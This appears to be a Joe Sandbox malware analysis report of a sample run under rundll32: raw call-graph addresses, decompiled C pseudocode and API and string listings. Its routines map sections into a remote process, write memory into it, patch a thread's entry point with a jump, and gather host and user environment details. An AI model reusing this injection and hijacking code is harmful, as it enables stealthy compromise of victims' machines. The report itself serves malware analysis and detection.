14438->14439 14440 44576aa 14439->14440 14441 44576e6 14440->14441 14442 445755a 5 API calls 14440->14442 14447 44578c5 14441->14447 14443 44576c9 14442->14443 14444 4460485 lstrlenW 14443->14444 14445 44576dd 14444->14445 14446 4458ecb lstrlenW 14445->14446 14446->14441 14637 4461d21 14447->14637 14449 44578de 14449->14179 14451 44611bb 14450->14451 14453 44611c2 14451->14453 14463 44628ef 14451->14463 14453->14412 14455 4458938 14454->14455 14456 445893d 14454->14456 14455->14414 14481 4461293 14456->14481 14459 4461c43 14458->14459 14460 4461c48 14459->14460 14493 4461bd8 14459->14493 14460->14420 14462 4461c61 14462->14420 14464 4462931 14463->14464 14465 44628fe 14463->14465 14464->14453 14466 4462922 SwitchToThread 14465->14466 14467 446290f 14465->14467 14466->14464 14466->14466 14468 4462918 14467->14468 14470 44628c9 14467->14470 14468->14453 14475 4462951 GetModuleHandleW 14470->14475 14472 44628d6 14474 44628e4 14472->14474 14480 4462933 _time64 GetCurrentProcessId 14472->14480 14474->14468 14476 446296f GetProcAddress 14475->14476 14479 44629a0 14475->14479 14477 4462983 GetProcAddress 14476->14477 14476->14479 14478 4462992 GetProcAddress 14477->14478 14477->14479 14478->14479 14479->14472 14480->14474 14482 446129e 14481->14482 14484 44612c5 14481->14484 14482->14484 14485 44612d9 14482->14485 14484->14455 14486 4461307 14485->14486 14487 44612e4 14485->14487 14486->14484 14487->14486 14489 4462edb 14487->14489 14490 4462ef3 14489->14490 14491 4462f7a strncpy 14490->14491 14492 4462f46 14490->14492 14491->14492 14492->14486 14494 4461beb 14493->14494 14496 4461c07 14494->14496 14497 44614c5 14494->14497 14496->14462 14498 44614f3 14497->14498 14508 4461505 14497->14508 14499 44616c3 14498->14499 14500 44615b0 14498->14500 14501 446152f 14498->14501 14502 446155f 14498->14502 14507 446158f 14498->14507 14498->14508 14505 4461c8e 2 API calls 14499->14505 14538 4461c8e _snprintf 14500->14538 14504 4461535 _snprintf 14501->14504 14521 44633da 14502->14521 
14504->14508 14510 44616f2 14505->14510 14533 4461a0a 14507->14533 14508->14496 14510->14508 14512 4461774 14510->14512 14518 44618aa 14510->14518 14511 44614c5 11 API calls 14514 44615bf 14511->14514 14512->14508 14515 44617b5 qsort 14512->14515 14513 4461a0a 2 API calls 14513->14518 14514->14508 14514->14511 14515->14508 14520 44617de 14515->14520 14516 44614c5 11 API calls 14516->14518 14517 4461a0a 2 API calls 14517->14520 14518->14508 14518->14513 14518->14516 14519 44614c5 11 API calls 14519->14520 14520->14508 14520->14517 14520->14519 14522 44633e7 _snprintf 14521->14522 14523 44633e4 14521->14523 14524 4463487 14522->14524 14525 4463410 14522->14525 14523->14522 14524->14508 14525->14524 14543 44633b3 localeconv 14525->14543 14528 446344e strchr 14528->14524 14531 4463461 14528->14531 14529 446342a strchr 14529->14528 14530 4463438 14529->14530 14530->14524 14530->14528 14531->14524 14546 4458ecb 14531->14546 14535 4461a20 14533->14535 14534 4461ba8 14534->14508 14535->14534 14536 4461b23 _snprintf 14535->14536 14537 4461b3a _snprintf 14535->14537 14536->14535 14537->14535 14540 4461caf 14538->14540 14539 4461cb6 14539->14514 14540->14539 14541 4462edb strncpy 14540->14541 14542 4461ccc 14541->14542 14542->14514 14544 44633c3 strchr 14543->14544 14545 44633d5 strchr 14543->14545 14544->14545 14545->14528 14545->14529 14547 4458ef7 lstrlenW 14546->14547 14549 4458f2b 14547->14549 14549->14524 14549->14549 14573 4458dc9 RtlAllocateHeap 14550->14573 14552 44575fb 14553 446357b 2 API calls 14552->14553 14560 445767c 14552->14560 14554 445761f 14553->14554 14574 445755a 14554->14574 14556 4457634 14557 4460485 lstrlenW 14556->14557 14558 4457667 14557->14558 14559 4458f63 memset 14558->14559 14559->14560 14560->14424 14560->14425 14562 445750f 14561->14562 14563 44598d0 2 API calls 14562->14563 14564 445752b 14563->14564 14583 4458dc9 RtlAllocateHeap 14564->14583 14566 4457536 14567 4457550 14566->14567 14568 4459fa5 2 API calls 14566->14568 14567->14433 
14568->14567 14571 445fac3 14569->14571 14572 445fb09 14571->14572 14584 445fb10 14571->14584 14572->14427 14573->14552 14575 4457573 14574->14575 14576 4451080 2 API calls 14575->14576 14577 4457580 lstrcpynA 14576->14577 14578 445759e 14577->14578 14579 4458d87 2 API calls 14578->14579 14580 44575a8 14579->14580 14581 4458f63 memset 14580->14581 14582 44575cd 14581->14582 14582->14556 14583->14566 14589 445f7a3 memset memset 14584->14589 14586 445fb3c 14587 445fb5f 14586->14587 14615 445f5a1 14586->14615 14587->14571 14590 4459f6b 2 API calls 14589->14590 14591 445f7f5 14590->14591 14592 4459f6b 2 API calls 14591->14592 14593 445f802 14592->14593 14594 4459f6b 2 API calls 14593->14594 14595 445f80f 14594->14595 14596 4459f6b 2 API calls 14595->14596 14597 445f81c 14596->14597 14598 4459f6b 2 API calls 14597->14598 14599 445f829 14598->14599 14600 4458f63 memset 14599->14600 14613 445f83d 14600->14613 14601 445f8ba GetLastError 14601->14613 14602 445fa0d 14603 4458f63 memset 14602->14603 14608 445f887 14602->14608 14604 445fa2f 14603->14604 14607 445fa4b GetLastError 14604->14607 14604->14608 14605 445a1f8 GetSystemTimeAsFileTime 14605->14613 14606 445f8fb GetLastError 14606->14613 14607->14608 14608->14586 14609 445f953 GetLastError 14609->14613 14611 4459f6b 2 API calls 14611->14613 14612 4458d87 2 API calls 14612->14613 14613->14601 14613->14602 14613->14605 14613->14606 14613->14608 14613->14609 14613->14611 14613->14612 14614 445f9cd GetLastError 14613->14614 14631 445f6e9 14613->14631 14614->14613 14616 445f5be 14615->14616 14635 4458dc9 RtlAllocateHeap 14616->14635 14618 445f5d3 14620 445f5dc 14618->14620 14636 4458dc9 RtlAllocateHeap 14618->14636 14621 445f6af 14620->14621 14622 4458ddf 2 API calls 14620->14622 14623 445f6c7 14621->14623 14624 4458ddf 2 API calls 14621->14624 14622->14621 14623->14587 14624->14623 14625 445f689 GetLastError 14625->14620 14626 445f695 14625->14626 14628 445a1f8 GetSystemTimeAsFileTime 14626->14628 14627 445a1f8 

            Control-flow Graph

            C-Code - Quality: 95%
            			E0445D538(void* __ecx, intOrPtr __edx) {
            				void* _v8;
            				void* _v12;
            				void* _v16;
            				void* _v20;
            				long _v24;
            				long _v28;
            				short _v32;
            				char _v36;
            				intOrPtr* _v40;
            				intOrPtr _v44;
            				long _v48;
            				void* _v52;
            				void* _v53;
            				char _v64;
            				short _v68;
            				struct _WNDCLASSEXA _v116;
            				char _t81;
            				intOrPtr* _t83;
            				intOrPtr _t87;
            				intOrPtr _t90;
            				char _t97;
            				short _t98;
            				intOrPtr _t105;
            				long _t107;
            				char _t119;
            				void* _t124;
            				struct HWND__* _t132;
            				void* _t138;
            				void* _t147;
            				void* _t154;
            				intOrPtr _t155;
            				intOrPtr _t157;
            				void* _t158;
            				void* _t163;
            				void* _t165;
            
            				_t81 =  *0x446f8d4; // 0x450fc00
            				_t138 = 0;
            				_v12 = __ecx;
            				_t157 = __edx;
            				_v20 = 0;
            				_v52 = 0;
            				_v48 = 0;
            				_v16 = 0;
            				_v8 = 0;
            				_v24 = 0;
            				_v44 = __edx;
            				if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
            					E0445F15B(0x1f4);
            				}
            				_t12 = _t157 + 0x3c; // 0x852c50ff
            				_t83 =  *_t12 + _t157;
            				_v28 = _t138;
            				_v40 = _t83;
            				if( *_t83 != 0x4550) {
            					L14:
            					_t158 = _v12;
            					L15:
            					if(_v8 != _t138) {
            						_t90 =  *0x446f9d0; // 0x450fa00
            						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
            						_v8 = _t138;
            					}
            					L17:
            					if(_v16 != 0) {
            						_t87 =  *0x446f8d0; // 0x450f8c0
            						NtUnmapViewOfSection( *((intOrPtr*)(_t87 + 0x12c))(), _v16);
            					}
            					if(_v20 != 0) {
            						NtClose(_v20);
            					}
            					return _v8;
            				}
            				_v52 =  *((intOrPtr*)(_t83 + 0x50));
            				if(NtCreateSection( &_v20, 0xe, _t138,  &_v52, 0x40, 0x8000000, _t138) < 0) {
            					goto L14;
            				}
            				_t97 =  *"18293"; // 0x39323831
            				_v36 = _t97;
            				_t98 =  *0x446ce70; // 0x33
            				_v32 = _t98;
            				_v116.lpszClassName =  &_v64;
            				asm("movsd");
            				_v116.lpfnWndProc = DefWindowProcW;
            				_v116.cbWndExtra = _t138;
            				asm("movsd");
            				_v116.style = 0xb;
            				_v116.lpszMenuName = _t138;
            				_v116.cbSize = 0x30;
            				asm("movsb");
            				_v116.cbClsExtra = _t138;
            				_v116.hInstance = _t138;
            				if(RegisterClassExA( &_v116) != 0) {
            					_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
            					if(_t132 != 0) {
            						DestroyWindow(_t132);
            						UnregisterClassA( &_v64, _t138);
            					}
            				}
            				_t105 =  *0x446f8d0; // 0x450f8c0
            				_t107 = NtMapViewOfSection(_v20,  *((intOrPtr*)(_t105 + 0x12c))(),  &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40);
            				_t158 = _v12;
            				if(_t107 < 0 || NtMapViewOfSection(_v20, _t158,  &_v8, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40) < 0) {
            					goto L15;
            				} else {
            					_t154 = E04458E2E( *0x446f8d4, 0x1ac4);
            					_v36 = _t154;
            					if(_t154 == 0) {
            						goto L15;
            					}
            					 *((intOrPtr*)(_t154 + 0x224)) = _v8;
            					_t163 = VirtualAllocEx(_t158, _t138, 0x1ac4, 0x1000, 4);
            					WriteProcessMemory(_v12, _t163, _t154, 0x1ac4,  &_v28);
            					E04458DDF( &_v36, 0x1ac4);
            					_t119 =  *0x446f8d4; // 0x450fc00
            					_t155 =  *0x446f8e8; // 0x4450000
            					_v36 = _t119;
            					 *0x446f8e8 = _v8;
            					 *0x446f8d4 = _t163;
            					E04458EA6(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
            					E0445D4B7(_v16, _v8, _v44);
            					_t124 = E0445A5D0("Jjischug");
            					_v53 = _t138;
            					_t147 = 0xf;
            					if(_t124 > _t147) {
            						do {
            							L12:
            							_t63 = _t138 + 0x41; // 0x41
            							 *((char*)(_t165 + _t138 - 0x40)) = _t63;
            							_t138 = _t138 + 1;
            						} while (_t138 < _t147);
            						L13:
            						lstrlenW( &_v68);
            						 *0x446f8e8 = _t155;
            						 *0x446f8d4 = _v36;
            						goto L17;
            					}
            					_t147 = _t124;
            					if(_t147 == 0) {
            						goto L13;
            					}
            					goto L12;
            				}
            			}

            APIs
            • NtCreateSection.NTDLL(0445DA07,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 0445D5AA
            • RegisterClassExA.USER32(?), ref: 0445D5FE
            • CreateWindowExA.USER32 ref: 0445D629
            • DestroyWindow.USER32(00000000), ref: 0445D634
            • UnregisterClassA.USER32 ref: 0445D63F
            • NtMapViewOfSection.NTDLL(0445DA07,00000000), ref: 0445D66A
            • NtMapViewOfSection.NTDLL(0445DA07,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0445D691
            • VirtualAllocEx.KERNELBASE(00000000,00000000,00001AC4,00001000,00000004), ref: 0445D6D7
            • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00001AC4,?), ref: 0445D6F1
              • Part of subcall function 04458DDF: HeapFree.KERNEL32(00000000,00000000), ref: 04458E25
            • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,04456297), ref: 0445D769
            • NtUnmapViewOfSection.NTDLL(00000000), ref: 0445D7B1
            • NtClose.NTDLL(00000000), ref: 0445D7C5
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: Section$View$ClassCreateWindow$AllocCloseDestroyFreeHeapMemoryProcessRegisterUnmapUnregisterVirtualWritelstrlen
            • String ID: 0$18293$Jjischug$aeroflot
            • API String ID: 494031690-3772587274
            • Opcode ID: c3b94c7bb17a5d23f20207a56f288ea514daba769a68b28326ad7d13574b505c
            • Instruction ID: ee53e06438784baf6fb0a029e7303562a81c3fa22c76b59882adc454ba402b36
            • Opcode Fuzzy Hash: c3b94c7bb17a5d23f20207a56f288ea514daba769a68b28326ad7d13574b505c
            • Instruction Fuzzy Hash: 5881F5B5E00219EFEF10DF95E884AEEBBB8FF08704F14406AE945A7261D774AD04CB65
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 100%
            			E0445D9DE(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
            				long _v8;
            				long _v12;
            				void* _v16;
            				intOrPtr _v23;
            				void _v24;
            				long _v28;
            				struct _CONTEXT _v744;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* _t33;
            				void* _t57;
            				long _t59;
            				void* _t62;
            				void** _t65;
            				void* _t66;
            
            				_t65 = __edx;
            				_t57 = __ecx;
            				_t66 = 0;
            				if(E0445D309(__ecx, __edx, __edx, 0) != 0) {
            					_t33 = E0445D538( *((intOrPtr*)(__edx)), _a4); // executed
            					_t66 = _t33;
            					if(_t66 != 0) {
            						E04458F63( &_v744, 0, 0x2cc);
            						_v744.ContextFlags = 0x10002;
            						if(GetThreadContext(_t65[1],  &_v744) != 0) {
            							_t62 = _v744.Eax;
            							_v12 = _v12 & 0x00000000;
            							_v24 = 0xe9;
            							_t59 = 5;
            							_v23 = _t66 - _t62 - _a4 + _t57 + 0xfffffffb;
            							_v8 = _t59;
            							_v16 = _t62;
            							if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t65, _v744.Eax,  &_v24, _t59,  &_v8) < 0) {
            								L6:
            								_t66 = 0;
            							} else {
            								_v28 = _v28 & 0x00000000;
            								if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, _v12,  &_v28) < 0) {
            									goto L6;
            								}
            							}
            						}
            					}
            				}
            				E0445D47C();
            				return _t66;
            			}

            APIs
              • Part of subcall function 0445D309: LoadLibraryW.KERNEL32 ref: 0445D403
              • Part of subcall function 0445D538: NtCreateSection.NTDLL(0445DA07,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 0445D5AA
              • Part of subcall function 0445D538: RegisterClassExA.USER32(?), ref: 0445D5FE
              • Part of subcall function 0445D538: CreateWindowExA.USER32 ref: 0445D629
              • Part of subcall function 0445D538: DestroyWindow.USER32(00000000), ref: 0445D634
              • Part of subcall function 0445D538: UnregisterClassA.USER32 ref: 0445D63F
              • Part of subcall function 04458F63: memset.MSVCRT ref: 04458F75
            • GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 0445DA40
            • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 0445DA89
            • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 0445DAA6
            • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 0445DAC7
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: MemoryVirtual$ClassCreateProtectWindow$ContextDestroyLibraryLoadRegisterSectionThreadUnregisterWritememset
            • String ID:
            • API String ID: 1578692462-0
            • Opcode ID: a60e76562fac9f42f4ea54f85519c91da7d9e04721cc24148dd3494585f087ec
            • Instruction ID: 2be7cc27c53be5091b5556af9bc4979ed54cad9c5cb451e19ee99af6b293b3ab
            • Opcode Fuzzy Hash: a60e76562fac9f42f4ea54f85519c91da7d9e04721cc24148dd3494585f087ec
            • Instruction Fuzzy Hash: 3E312FB2A00109AFEF11DFA5D944FDEB7B8EF48214F1441A6E905E2261D770EE44CB90
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 79%
            			E0445DFC2(void* __fp0) {
            				char _v8;
            				char _v12;
            				char _v16;
            				char _v144;
            				char _v656;
            				char _v668;
            				char _v2644;
            				void* __esi;
            				struct _OSVERSIONINFOA* _t68;
            				intOrPtr _t70;
            				void* _t71;
            				intOrPtr _t73;
            				void* _t74;
            				intOrPtr _t75;
            				intOrPtr* _t77;
            				intOrPtr _t79;
            				intOrPtr _t80;
            				intOrPtr _t81;
            				intOrPtr _t87;
            				int _t90;
            				intOrPtr _t92;
            				void* _t93;
            				void* _t97;
            				intOrPtr _t99;
            				intOrPtr _t101;
            				short _t106;
            				char _t108;
            				intOrPtr _t113;
            				intOrPtr _t116;
            				intOrPtr _t119;
            				intOrPtr _t123;
            				intOrPtr _t134;
            				intOrPtr _t136;
            				intOrPtr _t138;
            				intOrPtr _t141;
            				intOrPtr _t143;
            				intOrPtr _t148;
            				void* _t149;
            				WCHAR* _t150;
            				char* _t151;
            				intOrPtr _t162;
            				intOrPtr _t177;
            				void* _t191;
            				struct _OSVERSIONINFOA* _t192;
            				void* _t193;
            				void* _t195;
            				char _t198;
            				void* _t199;
            				char* _t200;
            				void* _t203;
            				int* _t204;
            				void* _t216;
            
            				_t216 = __fp0;
            				_t148 =  *0x446f8e8; // 0x4450000
            				_t68 = E04458DC9(0x1ac4);
            				_t192 = _t68;
            				if(_t192 != 0) {
            					 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId();
            					_t70 =  *0x446f8d0; // 0x450f8c0
            					_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
            					_t3 = _t192 + 0x648; // 0x648
            					E044635A9( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
            					_t73 =  *0x446f8d0; // 0x450f8c0
            					_t5 = _t192 + 0x1644; // 0x1644
            					_t194 = _t5;
            					_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
            					_t207 = _t74;
            					if(_t74 != 0) {
            						 *((intOrPtr*)(_t192 + 0x1854)) = E044597E9(_t194, _t207);
            					}
            					_t75 =  *0x446f8d0; // 0x450f8c0
            					_t77 = E0445CA0A( *((intOrPtr*)(_t75 + 0x12c))()); // executed
            					 *((intOrPtr*)(_t192 + 0x110)) = _t77;
            					_t159 =  *_t77;
            					if(E0445CB85( *_t77) == 0) {
            						_t79 = E0445CA5A(_t159, _t194); // executed
            						__eflags = _t79;
            						_t162 = (0 | _t79 > 0x00000000) + 1;
            						__eflags = _t162;
            						 *((intOrPtr*)(_t192 + 0x214)) = _t162;
            					} else {
            						 *((intOrPtr*)(_t192 + 0x214)) = 3;
            					}
            					_t14 = _t192 + 0x220; // 0x220, executed
            					_t80 = E0445F3A0(_t14); // executed
            					 *((intOrPtr*)(_t192 + 0x218)) = _t80;
            					_t81 = E0445F365(_t14); // executed
            					 *((intOrPtr*)(_t192 + 0x21c)) = _t81;
            					_t17 = _t192 + 0x114; // 0x114
            					_t195 = _t17;
            					 *((intOrPtr*)(_t192 + 0x224)) = _t148;
            					_push( &_v16);
            					_v12 = 0x80;
            					_push( &_v8);
            					_v8 = 0x100;
            					_push( &_v656);
            					_push( &_v12);
            					_push(_t195);
            					_push( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x110)))));
            					_t87 =  *0x446f8d8; // 0x450fab0
            					_push(0); // executed
            					if( *((intOrPtr*)(_t87 + 0x6c))() == 0) {
            						GetLastError();
            					}
            					_t90 = GetSystemMetrics(0x1000);
            					_t28 = _t192 + 0x228; // 0x228
            					_t149 = _t28;
            					 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000;
            					E0445DFBB(_t149); // executed
            					_t211 = _t149;
            					if(_t149 != 0) {
            						 *((intOrPtr*)(_t192 + 0x434)) = E044597E9(_t149, _t211);
            					}
            					_t92 = E0445C85A();
            					_t33 = _t192 + 0xb0; // 0xb0
            					_t196 = _t33;
            					 *((intOrPtr*)(_t192 + 0xac)) = _t92;
            					_t93 = E0445C64D(_t92, _t33, _t211, _t216);
            					_t35 = _t192 + 0xd0; // 0xd0
            					E04459BD5(_t93, _t33, _t35);
            					_t36 = _t192 + 0x438; // 0x438
            					E04459803(_t149, _t36);
            					_t97 = E0445E34A(_t196, E0445A5D0(_t33), 0);
            					_t37 = _t192 + 0x100c; // 0x100c
            					E0445C870(_t97, _t37, _t216);
            					_t99 =  *0x446f8d0; // 0x450f8c0
            					_t101 = E0445CBD7( *((intOrPtr*)(_t99 + 0x12c))(_t195)); // executed
            					 *((intOrPtr*)(_t192 + 0x101c)) = _t101;
            					E04458F63(_t192, 0, 0x9c);
            					_t204 = _t203 + 0xc;
            					_t192->dwOSVersionInfoSize = 0x9c;
            					GetVersionExA(_t192);
            					 *((intOrPtr*)(_t192 + 0xa8)) = E0445DDBE(_t100);
            					_t106 = E0445DDE7(_t105);
            					_t41 = _t192 + 0x1020; // 0x1020
            					_t150 = _t41;
            					 *((short*)(_t192 + 0x9c)) = _t106;
            					GetWindowsDirectoryW(_t150, 0x104);
            					_t108 = E04459F85(_t105, 0xf73);
            					_t177 =  *0x446f8d0; // 0x450f8c0
            					_t198 = _t108;
            					 *_t204 = 0x104;
            					_push( &_v668);
            					_push(_t198);
            					_v8 = _t198;
            					if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
            						_t143 =  *0x446f8d0; // 0x450f8c0
            						 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
            					}
            					E04458D9A( &_v8);
            					_t113 =  *0x446f8d0; // 0x450f8c0
            					_t48 = _t192 + 0x1434; // 0x1434
            					_t199 = _t48;
            					 *_t204 = 0x209;
            					_push(_t199);
            					_push(L"USERPROFILE");
            					if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
            						E04459FE4(_t199, 0x105, L"%s\\%s", _t150);
            						_t141 =  *0x446f8d0; // 0x450f8c0
            						_t204 =  &(_t204[5]);
            						 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
            					}
            					_push(0x20a);
            					_t51 = _t192 + 0x122a; // 0x122a
            					_t151 = L"TEMP";
            					_t116 =  *0x446f8d0; // 0x450f8c0
            					_push(_t151);
            					if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
            						_t138 =  *0x446f8d0; // 0x450f8c0
            						 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
            					}
            					_push(0x40);
            					_t200 = L"SystemDrive";
            					_push( &_v144);
            					_t119 =  *0x446f8d0; // 0x450f8c0
            					_push(_t200);
            					if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
            						_t136 =  *0x446f8d0; // 0x450f8c0
            						 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
            					}
            					_v8 = 0x7f;
            					_t59 = _t192 + 0x199c; // 0x199c
            					_t123 =  *0x446f8d0; // 0x450f8c0
            					 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
            					_t62 = _t192 + 0x100c; // 0x100c
            					E044635A9(E0445E34A(_t62, E0445A5D0(_t62), 0),  &_v2644);
            					_t63 = _t192 + 0x1858; // 0x1858
            					E0446357B( &_v2644, _t63, 0x20);
            					_push( &_v2644);
            					_push(0x1e);
            					_t66 = _t192 + 0x1878; // 0x1878
            					_t191 = 0x14;
            					E044598D0(_t66, _t191);
            					_t134 = E0445DB68(_t191); // executed
            					 *((intOrPtr*)(_t192 + 0x1898)) = _t134;
            					return _t192;
            				}
            				return _t68;
            			}

            APIs
              • Part of subcall function 04458DC9: RtlAllocateHeap.NTDLL(00000008,?,?,04459793,00000100,?,0445661B), ref: 04458DD7
            • GetCurrentProcessId.KERNEL32 ref: 0445DFE9
            • GetLastError.KERNEL32 ref: 0445E0E3
            • GetSystemMetrics.USER32(00001000), ref: 0445E0F3
            • GetVersionExA.KERNEL32(00000000), ref: 0445E1A8
              • Part of subcall function 0445CA5A: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,04450000), ref: 0445CAFE
            • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0445E1D3
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: AllocateChangeCloseCurrentDirectoryErrorFindHeapLastMetricsNotificationProcessSystemVersionWindows
            • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
            • API String ID: 3131805607-2706916422
            • Opcode ID: bfa26404196f00dd73f7fe620bd9f17655b2d7e1f9d3e2359141ff7911387bbb
            • Instruction ID: 29c8acd0b9b1a1c23712cd1f4a7e5bce989813c53d5eb7fa45cbf99f5c1e31db
            • Opcode Fuzzy Hash: bfa26404196f00dd73f7fe620bd9f17655b2d7e1f9d3e2359141ff7911387bbb
            • Instruction Fuzzy Hash: 4E914C71700605EFEF04EB75D888FEAB7A8FF08704F14416AE94A97252DB74BA448B91
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 94%
            			E0445C778(WCHAR* __ecx, WCHAR* __edx) {
            				long _v8;
            				long _v12;
            				WCHAR* _v16;
            				short _v528;
            				short _v1040;
            				short _v1552;
            				intOrPtr _t23;
            				WCHAR* _t27;
            				signed int _t29;
            				void* _t33;
            				long _t38;
            				WCHAR* _t43;
            				WCHAR* _t56;
            
            				_t44 = __ecx;
            				_v8 = _v8 & 0x00000000;
            				_t43 = __edx;
            				_t56 = __ecx;
            				E04458F63(__edx, 0, 0x100);
            				_v12 = 0x100;
            				_t23 =  *0x446f8d0; // 0x450f8c0
            				 *((intOrPtr*)(_t23 + 0xbc))( &_v528,  &_v12);
            				lstrcpynW(__edx,  &_v528, 0x100);
            				_t27 = E04459F85(_t44, 0x978);
            				_v16 = _t27;
            				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
            				asm("sbb eax, eax");
            				_v8 = _v8 &  ~_t29;
            				E04458D9A( &_v16);
            				_t33 = E0445A5E9(_t43);
            				E04459FE4( &(_t43[E0445A5E9(_t43)]), 0x100 - _t33, L"%u", _v8);
            				lstrcatW(_t43, _t56);
            				_t38 = E0445A5E9(_t43);
            				_v12 = _t38;
            				CharUpperBuffW(_t43, _t38);
            				return E0445E34A(_t43, E0445A5E9(_t43) + _t40, 0);
            			}

            APIs
              • Part of subcall function 04458F63: memset.MSVCRT ref: 04458F75
            • lstrcpynW.KERNEL32(?,?,00000100), ref: 0445C7BF
            • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0445C7F1
              • Part of subcall function 04459FE4: _vsnwprintf.MSVCRT ref: 0445A001
            • lstrcatW.KERNEL32(?,00000114), ref: 0445C82A
            • CharUpperBuffW.USER32(?,00000000), ref: 0445C83C
            Memory Dump Source
            • Source File: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_4450000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
            • String ID:
            • API String ID: 455400327-0
            • Opcode ID: 462a91643f865a36c985e61792070f7553c3b61232789bd4fcb3b7dd349ae443
            • Instruction ID: 59e9935f1082f1835bad7df959a205203d206f7822570a95f0112872fc120df2
            • Opcode Fuzzy Hash: 462a91643f865a36c985e61792070f7553c3b61232789bd4fcb3b7dd349ae443
            • Instruction Fuzzy Hash: D22149B2A00218FFFF14ABA5DC49FAE77BCDF84214F1041AAF505D2152EA746E048B61
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            control_flow_graph 179 445ef38-445ef4f 180 445ef51-445ef79 179->180 181 445efac 179->181 180->181 182 445ef7b-445ef9e call 445a5d0 call 445e34a 180->182 183 445efae-445efb2 181->183 188 445efa0-445efaa 182->188 189 445efb3-445efca 182->189 188->181 188->182 190 445f020-445f022 189->190 191 445efcc-445efd4 189->191 190->183 191->190 192 445efd6 191->192 193 445efd8-445efde 192->193 194 445efe0-445efe2 193->194 195 445efee-445efff 193->195 194->195 196 445efe4-445efec 194->196 197 445f004-445f010 LoadLibraryA 195->197 198 445f001-445f002 195->198 196->193 196->195 197->181 199 445f012-445f01c GetProcAddress 197->199 198->197 199->181 200 445f01e 199->200 200->183
            C-Code - Quality: 100%
            			E0445EF38(void* __ecx, intOrPtr __edx) {
            				signed int _v8;
            				intOrPtr _v12;
            				intOrPtr _v16;
            				intOrPtr _v20;
            				intOrPtr _v24;
            				intOrPtr _v28;
            				char _v92;
            				intOrPtr _t41;
            				signed int _t47;
            				signed int _t49;
            				signed int _t51;
            				void* _t56;
            				struct HINSTANCE__* _t58;
            				_Unknown_base(*)()* _t59;
            				intOrPtr _t60;
            				void* _t62;
            				intOrPtr _t63;
            				void* _t69;
            				char _t70;
            				void* _t75;
            				CHAR* _t80;
            				void* _t82;
            
            				_t75 = __ecx;
            				_v12 = __edx;
            				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
            				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
            				if(_t41 == 0) {
            					L4:
            					return 0;
            				}
            				_t62 = _t41 + __ecx;
            				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
            				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
            				_t63 =  *((intOrPtr*)(_t62 + 0x18));
